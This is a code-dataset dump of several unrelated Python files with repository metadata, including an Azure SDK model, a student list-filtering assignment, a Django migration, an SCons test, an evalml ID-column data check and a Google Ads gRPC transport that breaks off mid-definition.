] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EffectiveNetworkSecurityGroupListResult(Model):
"""Response for list effective network security groups API service call.
:param value: A list of effective network security groups.
:type value:
list[~azure.mgmt.network.v2016_09_01.models.EffectiveNetworkSecurityGroup]
:param next_link: The URL to get the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EffectiveNetworkSecurityGroup]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(self, value=None, next_link=None):
self.value = value
self.next_link = next_link
| 35.818182 | 79 | 0.617597 |
16017decf0baaada2d9d5472a71a8503188fa41a | 2,539 | py | Python | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | CS116/a06-j4mai/a06-j4mai/a06q2.py | JohnMai1994/CS116-2018_Winter_Term | dc95e63b9b4ff853c0bb19432dbd09512d4740a1 | [
"MIT"
] | null | null | null | ##===============================================
## Jiadong Mai (20557203)
## CS 116 Winter 2018
## Assignment 06, Question 2
##===============================================
import check
# Question 2
# find_bigger(ints) consumes a (listof Int), ints, and returns a (listof Int)
# which values in the list that are bigger than all values that came before
# in the list
# find_bigger: (listof Int) -> (listof Int)
# Examples:
# find_bigger([0, 4, 5, 4]) => [0, 4, 5]
# find_bigger([1, 2, 4, 4]) => [1, 2, 4]
# find_bigger([-2, -4, -4, -1]) => [-2, -1]
# find_bigger([]) => []
def find_bigger(ints):
if ints==[]:
return []
else:
num = -1
z = [ints[0]]
max_num = ints[0]
for k in ints:
if max_num < k:
max_num = max(max_num, k)
z.append(k)
num +=1
else:
num +=1
return z
# Test:
# Test1: empty list
check.expect('empty', find_bigger([]), [])
# Test2: increasing order
check.expect('Increase Order1', find_bigger([1,2,3,4,5,6,7]), [1,2,3,4,5,6,7])
check.expect('Increase Order2', find_bigger([1,3,3,4,6,6,8]), [1,3,4,6,8])
check.expect('Increase Order3', find_bigger([1,2,4,5,8,10]), [1,2,4,5,8,10])
check.expect('Increase Order4', find_bigger([1,5,8,12,33,99]), [1,5,8,12,33,99])
check.expect('Increase Order5', find_bigger([1,15,15,15,90]), [1,15,90])
check.expect('Increase Order6', find_bigger([1,5,6,7]), [1,5,6,7])
# Test3: decreasing order
check.expect('Decreasing Order1', find_bigger([9,8,7,6,5,4,3]), [9])
check.expect('Decreasing Order2', find_bigger([19,7,4,2]), [19])
check.expect('Decreasing Order3', find_bigger([99,55,32,32,12,0]), [99])
check.expect('Decreasing Order4', find_bigger([87,4,3,67,3]), [87])
check.expect('Decreasing Order5', find_bigger([9,8,8,8,8,8,8]), [9])
check.expect('Decreasing Order6', find_bigger([9,8,2,9,4]), [9])
# Test4: up-down-up order
check.expect('Up-Down-UP Order1', find_bigger([2,6,9,8,7,7,5,8,10]), [2,6,9,10])
check.expect('Up-Down-UP Order2', find_bigger([2,19,7,5,100,101]), [2,19,100,101])
check.expect('Up-Down-UP Order3', find_bigger([2,20,21,20,21,22]), [2,20,21,22])
# Test5: All Same
check.expect('All Same', find_bigger([2,2,2,2,2]), [2])
check.expect('All Same', find_bigger([5,5,5]), [5])
# Test6: Sample Question
check.expect('Sample Question1', find_bigger([0, 4, 5, 4]), [0,4,5])
check.expect('Sample Question2', find_bigger([1,2,4,4]), [1,2,4])
check.expect('Sample Question3', find_bigger([-2,-4,-4,-1]), [-2,-1])
| 40.301587 | 82 | 0.587239 |
b40bb74f7993fda1dd802c692002947f60e3619b | 499 | py | Python | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 3 | 2022-01-25T16:36:19.000Z | 2022-03-04T06:00:16.000Z | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 8 | 2020-09-17T18:13:47.000Z | 2022-02-23T20:55:59.000Z | arts-main/arts_core/migrations/0006_auto_20200211_1621.py | conix-center/arts | 3ee48a4de49be3c6df744673581720d3eeaa9923 | [
"BSD-3-Clause"
] | 1 | 2020-11-12T09:34:14.000Z | 2020-11-12T09:34:14.000Z | # Generated by Django 3.0.3 on 2020-02-11 16:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('arts_core', '0005_auto_20200210_1706'),
]
operations = [
migrations.AlterField(
model_name='module',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='arts_core.Runtime'),
),
]
| 24.95 | 128 | 0.647295 |
4fcb674126a49190b28d9266b7075c64142f668f | 999 | py | Python | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | tspetl/stock_tool.py | jdgwartney/tsp-etl | 70540d3d13261849af512d97c153fc4f1e414bf5 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2016 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from tspetl import ETLTool
class StockTool(ETLTool):
def __init__(self):
super(StockTool, self).__init__()
@property
def name(self):
return 'stock'
@property
def help(self):
return 'Collects stock price and volume (Future Release)'
def add_parser(self, sub_parser):
super(StockTool, self).add_parser(sub_parser)
def run(self, args):
pass
| 27 | 74 | 0.706707 |
c1a3cfa16a65cf4e0bc781c28ab20ed788c7f249 | 2,600 | py | Python | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | 1705/351/tempfiletest.py | bdbaddog/dummy-for-migration-attachments | ad3b46d50b4c4b5e79363ae2fdcab3f15e1435de | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Put scons TEMPFILE support through some of it's paces
"""
import os
import stat
import TestSCons
test = TestSCons.TestSCons()
binPath = ['bin dir']
binName = ['testme.py']
test.subdir( binPath )
binFullName = os.path.normpath( binPath[0] + '/' + binName[0] )
test.write(binPath + binName, """\
#!/usr/bin/env python
import sys
if len( sys.argv ) != 2 :
print( 'ERROR: expecting one and only one argument!' )
f = open( sys.argv[1][1:], 'r' )
contents = f.read()
f.close()
outFile, rest = contents.split( ' ' , 1 )
f = open( outFile, 'w' )
f.write( rest.strip() )
f.close()
""")
testme_py = test.workpath(binFullName)
st = os.stat(testme_py)
os.chmod(testme_py, st[stat.ST_MODE]|0111)
sourcePath = 'input dir'
sourceName = 'inputFile%d'
numFiles = 100
sourceTemplate = os.path.normpath( '%s/%s' % (sourcePath, sourceName) )
test.subdir( [sourcePath] )
test.write('SConstruct', """
import os
env = Environment(
BUILDBIN = "%s",
BUILDCOM = "${TEMPFILE('$\\"BUILDBIN\\" $TARGET $SOURCES')}",
MAXLINELENGTH = 32,
)
env.Command('foo.out', ['%s' %% x for x in range(0,%d)], '$BUILDCOM')
""" % (binFullName,sourceTemplate,numFiles) )
for x in range(0, numFiles ) :
test.write( [sourcePath,sourceName % x] , "dummy\n")
test.run(arguments = ' --quiet -Q .', stdout = '' )
output = ' '.join( ['"' + sourceTemplate % (x) + '"' for x in range(0, numFiles)] )
test.must_match( 'foo.out', output )
test.pass_test()
| 30.232558 | 83 | 0.703077 |
1e4459c7be221a95b486ae16c1fa2ae7ba81d454 | 7,408 | py | Python | evalml/data_checks/id_columns_data_check.py | ColinRTaylor/evalml | ef4374494b50e22757f44edb753e54efbf71f430 | [
"BSD-3-Clause"
] | null | null | null | evalml/data_checks/id_columns_data_check.py | ColinRTaylor/evalml | ef4374494b50e22757f44edb753e54efbf71f430 | [
"BSD-3-Clause"
] | 1 | 2022-02-19T12:59:09.000Z | 2022-02-19T12:59:09.000Z | evalml/data_checks/id_columns_data_check.py | isabella232/evalml | 5b372d0dfac05ff9b7e41eb494a9df1bf2da4a9d | [
"BSD-3-Clause"
] | null | null | null | """Data check that checks if any of the features are likely to be ID columns."""
from evalml.data_checks import (
DataCheck,
DataCheckActionCode,
DataCheckActionOption,
DataCheckMessageCode,
DataCheckWarning,
)
from evalml.utils import infer_feature_types
class IDColumnsDataCheck(DataCheck):
"""Check if any of the features are likely to be ID columns.
Args:
id_threshold (float): The probability threshold to be considered an ID column. Defaults to 1.0.
"""
def __init__(self, id_threshold=1.0):
if id_threshold < 0 or id_threshold > 1:
raise ValueError("id_threshold must be a float between 0 and 1, inclusive.")
self.id_threshold = id_threshold
def validate(self, X, y=None):
"""Check if any of the features are likely to be ID columns. Currently performs a number of simple checks.
Checks performed are:
- column name is "id"
- column name ends in "_id"
- column contains all unique values (and is categorical / integer type)
Args:
X (pd.DataFrame, np.ndarray): The input features to check.
y (pd.Series): The target. Defaults to None. Ignored.
Returns:
dict: A dictionary of features with column name or index and their probability of being ID columns
Examples:
>>> import pandas as pd
Columns that end in "_id" and are completely unique are likely to be ID columns.
>>> df = pd.DataFrame({
... "customer_id": [123, 124, 125, 126, 127],
... "Sales": [10, 42, 31, 51, 61]
... })
...
>>> id_col_check = IDColumnsDataCheck()
>>> assert id_col_check.validate(df) == [
... {
... "message": "Columns 'customer_id' are 100.0% or more likely to be an ID column",
... "data_check_name": "IDColumnsDataCheck",
... "level": "warning",
... "code": "HAS_ID_COLUMN",
... "details": {"columns": ["customer_id"], "rows": None},
... "action_options": [
... {
... "code": "DROP_COL",
... "data_check_name": "IDColumnsDataCheck",
... "parameters": {},
... "metadata": {"columns": ["customer_id"], "rows": None}
... }
... ]
... }
... ]
Columns named "ID" with all unique values will also be identified as ID columns.
>>> df = df.rename(columns={"customer_id": "ID"})
>>> id_col_check = IDColumnsDataCheck()
>>> assert id_col_check.validate(df) == [
... {
... "message": "Columns 'ID' are 100.0% or more likely to be an ID column",
... "data_check_name": "IDColumnsDataCheck",
... "level": "warning",
... "code": "HAS_ID_COLUMN",
... "details": {"columns": ["ID"], "rows": None},
... "action_options": [
... {
... "code": "DROP_COL",
... "data_check_name": "IDColumnsDataCheck",
... "parameters": {},
... "metadata": {"columns": ["ID"], "rows": None}
... }
... ]
... }
... ]
Despite being all unique, "Country_Rank" will not be identified as an ID column as id_threshold is set to 1.0
by default and its name doesn't indicate that it's an ID.
>>> df = pd.DataFrame({
... "Country_Rank": [1, 2, 3, 4, 5],
... "Sales": ["very high", "high", "high", "medium", "very low"]
... })
...
>>> id_col_check = IDColumnsDataCheck()
>>> assert id_col_check.validate(df) == []
However lowering the threshold will cause this column to be identified as an ID.
>>> id_col_check = IDColumnsDataCheck()
>>> id_col_check = IDColumnsDataCheck(id_threshold=0.95)
>>> assert id_col_check.validate(df) == [
... {
... "message": "Columns 'Country_Rank' are 95.0% or more likely to be an ID column",
... "data_check_name": "IDColumnsDataCheck",
... "level": "warning",
... "details": {"columns": ["Country_Rank"], "rows": None},
... "code": "HAS_ID_COLUMN",
... "action_options": [
... {
... "code": "DROP_COL",
... "data_check_name": "IDColumnsDataCheck",
... "parameters": {},
... "metadata": {"columns": ["Country_Rank"], "rows": None}
... }
... ]
... }
... ]
"""
messages = []
X = infer_feature_types(X)
col_names = [col for col in X.columns]
cols_named_id = [
col for col in col_names if (str(col).lower() == "id")
] # columns whose name is "id"
id_cols = {col: 0.95 for col in cols_named_id}
X = X.ww.select(include=["Integer", "Categorical"])
check_all_unique = X.nunique() == len(X)
cols_with_all_unique = check_all_unique[
check_all_unique
].index.tolist() # columns whose values are all unique
id_cols.update(
[
(col, 1.0) if col in id_cols else (col, 0.95)
for col in cols_with_all_unique
]
)
col_ends_with_id = [
col for col in col_names if str(col).lower().endswith("_id")
] # columns whose name ends with "_id"
id_cols.update(
[
(col, 1.0) if str(col) in id_cols else (col, 0.95)
for col in col_ends_with_id
]
)
id_cols_above_threshold = {
key: value for key, value in id_cols.items() if value >= self.id_threshold
}
if id_cols_above_threshold:
warning_msg = "Columns {} are {}% or more likely to be an ID column"
messages.append(
DataCheckWarning(
message=warning_msg.format(
(", ").join(
["'{}'".format(str(col)) for col in id_cols_above_threshold]
),
self.id_threshold * 100,
),
data_check_name=self.name,
message_code=DataCheckMessageCode.HAS_ID_COLUMN,
details={"columns": list(id_cols_above_threshold)},
action_options=[
DataCheckActionOption(
DataCheckActionCode.DROP_COL,
data_check_name=self.name,
metadata={"columns": list(id_cols_above_threshold)},
)
],
).to_dict()
)
return messages
| 40.26087 | 121 | 0.470572 |
5902c4103e325ab859e0b6bccadb77b72f64c38e | 807 | py | Python | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | import config
config.setup_examples()
import infermedica_api
if __name__ == '__main__':
api = infermedica_api.get_api()
# Prepare the diagnosis request object
request = infermedica_api.Diagnosis(sex='male', age=30)
request.add_symptom('s_1193', 'present')
request.add_symptom('s_488', 'present')
request.add_symptom('s_418', 'absent')
# Alternatively prepare a dict based request object
# request = {
# 'sex': 'male',
# 'age': 30,
# 'evidence': [
# {'id': 's_1193', 'choice_id': 'present'},
# {'id': 's_488', 'choice_id': 'present'},
# {'id': 's_418', 'choice_id': 'absent'}
# ]
# }
# call triage method
request = api.suggest(request)
# and see the results
print('\n\n', request)
| 25.21875 | 59 | 0.582404 |
941cbf414ce71f3e04619fa1d65e9080e660d806 | 6,276 | py | Python | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | ##### database.py ####
from config import Database_URI
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import os
import pandas as pd
from datetime import datetime
from models import HEADR,CONSU,Base
from sqlalchemy.exc import IntegrityError
import shutil
#Connecting to database
engine = create_engine(Database_URI, echo=False)
#Binding session to engine i.e specific database
Session= sessionmaker(bind=engine)
s = Session() # Allows python to interact with PostgreSQL
#Creating table after importing original Base from models module
Base.metadata.create_all(bind=engine)
s.commit() #uploading newly created table
#File paths showing where the different files are
Original_data_folder = "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/sample_data/"
uploaded_data_folder= "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/Uploaded data/"
Bad_data_folder= "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/Bad data/"
files = os.listdir(Original_data_folder)
#Function that converts the time to correct format
def time_convertor(raw_time):
length = len(str(int(raw_time))) #length of time string
if length < 4: #if the length is lessthan 4 i.e not not in a HH:MM format
missing_values = 4 - length #amount of values missing
raw_time = '0'*missing_values + str(int(raw_time)) #missing values added at the front to provide the data in an accurate HH:MM format
Time = datetime.strptime( raw_time, "%H%M").time() #Time converison
return Time
else:
raw_time = str(int(raw_time)) #Changing time to an integer to get rid of the digits after the point
Time = datetime.strptime( raw_time, "%H%M").time() #Time converison
return Time
for file in files:
df = pd.read_csv(Original_data_folder+file) #Pandas dataframe for a given file
To_Head = list(df.columns) #List of columns in dataframe excluding the header
N_rows = len(df.index) - 1 #Number of rows in dataframe excluding the footer
#if function that checks if whole file was tranferred i.e headers and footers
if (To_Head[0] == 'HEADR') & (df.iloc[-1][0] == 'TRAIL'):
df.drop(df.columns[-1], axis=1, inplace=True) #Dropping File_Generation_Number column since its the last column
df.dropna(inplace=True, how='any', axis=0) #Dropping footer row
Creation_date = datetime.strptime(To_Head[3], "%Y%m%d").date() #Date conversion
Creation_time = datetime.strptime(To_Head[4], "%H%M%S").time() #Time conversion
To_Head.pop(3) #Removing date string from list
To_Head.pop(3) #Removing time string from list
To_Head.insert(3, Creation_date) #inserting the newly converted date back into the list
To_Head.insert(4, Creation_time) #inserting the newly converted Time back into the list
df[df.columns[3]] = df[df.columns[3]].apply(lambda x: time_convertor(x))
df[df.columns[2]] = df[df.columns[2]].apply(lambda x: datetime.strptime(str(int(x)), "%Y%m%d").date())
#List of rows of records as tuples
rows = list(map(tuple, df.to_numpy()))
# Try block is employed to deal with non-unique File Generation Numbers(FGN). To make sure the same file isn't uploaded again
try:
headers = HEADR(
Number_of_rows = N_rows,File_Type=To_Head[1], Company_ID=To_Head[2],
File_Creation_Date=To_Head[3], File_Creation_Time=To_Head[4], File_Generation_Number=To_Head[5])
s.add(headers)
s.commit()
for row in rows:
#Overwrite query that checks to see if the data being uploaded shares the same meter number and measurement datetime
over_write_query =s.query(CONSU).filter(CONSU.Meter_Number == float(row[1]),
CONSU.Measurement_Date == row[2], CONSU.Measurement_Time ==row[3] ).first()
#if function that checks if query returned isn't empty i.e the data is going to be overwritten
if over_write_query is not None:
#Row in database with matching parameters is overwritten
over_write_result = s.query(CONSU).filter(CONSU.Meter_Number == float(row[1]), CONSU.Measurement_Date == row[2],
CONSU.Measurement_Time ==row[3]).update({CONSU.Record_Identifier:row[0],
CONSU.Meter_Number: float(row[1]), CONSU.Measurement_Date: row[2],
CONSU.Measurement_Time:row[3],CONSU.Consumption:float(row[4]),
CONSU.Header_id:headers.id}, synchronize_session="evaluate")
else:
consus = CONSU(Record_Identifier=row[0], Meter_Number=float(row[1]), Measurement_Date=row[2],
Measurement_Time=row[3], Consumption=float(row[4]), Header_id=headers.id)
s.add(consus) #Inserting rows in table
# #Moving file to new location to prevent duolication
Old_location = Original_data_folder + file #Original data folder
New_location = uploaded_data_folder + file #Target data folder
shutil.move(Old_location, New_location)
except IntegrityError: #Python returns Integrity error if the File Genreation Number is non-unique
s.rollback() #Rolls back the current session
# Moving repeated file to uploaded data folder
Old_location = Original_data_folder + file # Original data folder
Target_location = Bad_data_folder+file
shutil.move(Old_location,Target_location)
else:
# Moving bad data to bad data folder
Old_location = Original_data_folder + file # Original data folder
Target_location = Bad_data_folder + file #Target location for bad data
shutil.move(Old_location, Target_location)
#Pushing all the changes to the Database
s.commit()
#Ending any transactions in progress
s.close() | 51.867769 | 143 | 0.662843 |
279d297050b7eb4b5ec43cc2a980a9250677d9fc | 3,201 | py | Python | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | """
UnpacMe
# Introduction Welcome to the UNPACME API! All the malware unpacking and file analysis features that you are familiar with on the [unpac.me](https://www.unpac.me/) website are available through our API. You can easily integrate our unpacker into your malware analysis pipeline and begin unpacking at scale! # Authentication The public UNPACME API is publicly available and can be accessed without authentication. In order to use the private UNPACME API you must sign up for an account with UNPACME. Once you have a valid user account you can view your personal API key in your user profile. <SecurityDefinitions /> # Response Structure When interacting with the UNPACME API, if the request was correctly handled, a <b>200</b> HTTP status code will be returned. The body of the response will usually be a JSON object (except for file downloads). ## Response Status Codes Status Code | Description | Notes ------------- | ------------- | - 200 | OK | The request was successful 400 | Bad Request | The request was somehow incorrect. This can be caused by missing arguments or arguments with wrong values. 401 | Unauthorized | The supplied credentials, if any, are not sufficient to access the resource 403 | Forbidden | The account does not have enough privileges to make the request. 404 | Not Found | The requested resource is not found 429 | Too Many Requests | The request frequency has exceeded one of the account quotas (minute, daily or monthly). Monthly quotas are reset on the 1st of the month at 00:00 UTC. 500 | Server Error | The server could not return the representation due to an internal server error ## Error Response If an error has occurred while handling the request an error status code will be returend along with a JSON error message with the following properties. Property | Description ------------- | ------------- Error | The error type Description | A more informative message # Example Clients The following clients can be used to interact with the UNPACME API directly and are provided as examples. These clients are community projects and are not maintained or developed by UNPACME. UNPACME makes no claim as to the safety of these clients, use at your own risk. - [UnpacMe Python Client](https://github.com/larsborn/UnpacMeClient) (Python) - [UnpacMe GO Client](https://github.com/kryptoslogic/unpacme-go) (Golang) - [UnpacMe Library](https://github.com/R3MRUM/unpacme) (Python) - [AssemblyLine](https://github.com/CybercentreCanada/assemblyline-service-unpacme) (Automation Service) <br> # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import unpacme
from unpacme.model.search_entity import SearchEntity
class TestSearchEntity(unittest.TestCase):
"""SearchEntity unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSearchEntity(self):
"""Test SearchEntity"""
# FIXME: construct object with mandatory attributes with example values
# model = SearchEntity() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 88.916667 | 2,573 | 0.739144 |
9b816d06f19a09f6df42533fd92081c66a2343d9 | 11,778 | py | Python | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v4.resources.types import billing_setup
from google.ads.googleads.v4.services.types import billing_setup_service
from .base import BillingSetupServiceTransport, DEFAULT_CLIENT_INFO
class BillingSetupServiceGrpcTransport(BillingSetupServiceTransport):
"""gRPC backend transport for BillingSetupService.
A service for designating the business entity responsible for
accrued costs.
A billing setup is associated with a payments account. Billing-
related activity for all billing setups associated with a
particular payments account will appear on a single invoice
generated monthly.
Mutates:
The REMOVE operation cancels a pending billing setup. The CREATE
operation creates a new billing setup.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_billing_setup(
self,
) -> Callable[
[billing_setup_service.GetBillingSetupRequest],
